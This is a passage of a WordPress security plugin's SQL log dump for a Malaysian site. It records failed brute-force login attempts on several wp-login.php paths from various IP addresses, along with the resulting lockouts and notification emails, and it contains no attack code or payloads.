Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYFfDDrcQxTmGrCWuaKUQAAAc0\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"92.222.9.173\";s:11:\"REMOTE_PORT\";s:5:\"40200\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYFfDDrcQxTmGrCWuaKUQAAAc0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064318.2766\";s:12:\"REQUEST_TIME\";s:10:\"1569064318\";}}','notice','2019-09-21 11:12:00','2019-09-21 11:11:58',17798336,19288648,'https://bintara.com.my/blog/wp-login.php',1,0,'92.222.9.173'),(25512,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:11:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:11:58\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:26:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:26:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:12:00','2019-09-21 11:11:58',17882992,19288648,'https://bintara.com.my/blog/wp-login.php',1,0,'92.222.9.173'),(25513,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:12:00','2019-09-21 11:11:58',18088984,19288648,'https://bintara.com.my/blog/wp-login.php',1,0,'92.222.9.173'),(25514,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYFz3kXpgmG5P@iB8kS5QAAAIo\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"54292\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYFz3kXpgmG5P@iB8kS5QAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064400.9798\";s:12:\"REQUEST_TIME\";s:10:\"1569064400\";}}','notice','2019-09-21 11:13:23','2019-09-21 11:13:21',17797480,19287888,'https://bintara.com.my/test/wp-login.php',1,0,'93.114.86.226'),(25515,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYF3LfBTP0kPOVnb8jp9QAAAE4\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.216.150\";s:11:\"REMOTE_PORT\";s:5:\"38084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYF3LfBTP0kPOVnb8jp9QAAAE4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064412.8289\";s:12:\"REQUEST_TIME\";s:10:\"1569064412\";}}','notice','2019-09-21 11:13:34','2019-09-21 11:13:33',17801096,19293024,'https://bintara.com.my/wordpress/wp-login.php',1,0,'163.172.216.150'),(25516,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:13:33\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:13:33\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:28:33\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:28:33\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:13:34','2019-09-21 11:13:33',17885936,19293024,'https://bintara.com.my/wordpress/wp-login.php',1,0,'163.172.216.150'),(25517,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:13:34','2019-09-21 11:13:33',18091520,19293024,'https://bintara.com.my/wordpress/wp-login.php',1,0,'163.172.216.150'),(25518,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYF@liJ7D9Gn7wDPh8XAgAAAMw\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.245.135.74\";s:11:\"REMOTE_PORT\";s:5:\"56650\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYF@liJ7D9Gn7wDPh8XAgAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064443.0657\";s:12:\"REQUEST_TIME\";s:10:\"1569064443\";}}','notice','2019-09-21 11:14:05','2019-09-21 11:14:03',17793384,19283440,'https://bintara.com.my/wp/wp-login.php',1,0,'157.245.135.74'),(25519,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYGKFiJ7D9Gn7wDPh8XCQAAAMQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"47180\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYGKFiJ7D9Gn7wDPh8XCQAAAMQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064491.9567\";s:12:\"REQUEST_TIME\";s:10:\"1569064491\";}}','notice','2019-09-21 11:14:54','2019-09-21 11:14:53',17795672,19285120,'https://bintara.com.my/wp/wp-login.php',1,0,'132.148.157.66'),(25520,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYGKXkXpgmG5P@iB8kTMQAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"154.127.59.254\";s:11:\"REMOTE_PORT\";s:5:\"51944\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYGKXkXpgmG5P@iB8kTMQAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064491.9558\";s:12:\"REQUEST_TIME\";s:10:\"1569064491\";}}','notice','2019-09-21 11:14:55','2019-09-21 11:14:53',17796304,19288688,'https://bintara.com.my/2019/wp-login.php',1,0,'154.127.59.254'),(25521,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:14:53\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:14:53\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:29:53\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:29:53\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:14:55','2019-09-21 11:14:53',17880272,19288688,'https://bintara.com.my/2019/wp-login.php',1,0,'154.127.59.254'),(25522,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:14:55','2019-09-21 11:14:53',18086496,19288688,'https://bintara.com.my/2019/wp-login.php',1,0,'154.127.59.254'),(25523,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYGOXkXpgmG5P@iB8kTUgAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"198.12.149.7\";s:11:\"REMOTE_PORT\";s:5:\"37732\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYGOXkXpgmG5P@iB8kTUgAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064509.3859\";s:12:\"REQUEST_TIME\";s:10:\"1569064509\";}}','notice','2019-09-21 11:15:14','2019-09-21 11:15:13',17797472,19289480,'https://bintara.com.my/2019/wp-login.php',1,0,'198.12.149.7'),(25524,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 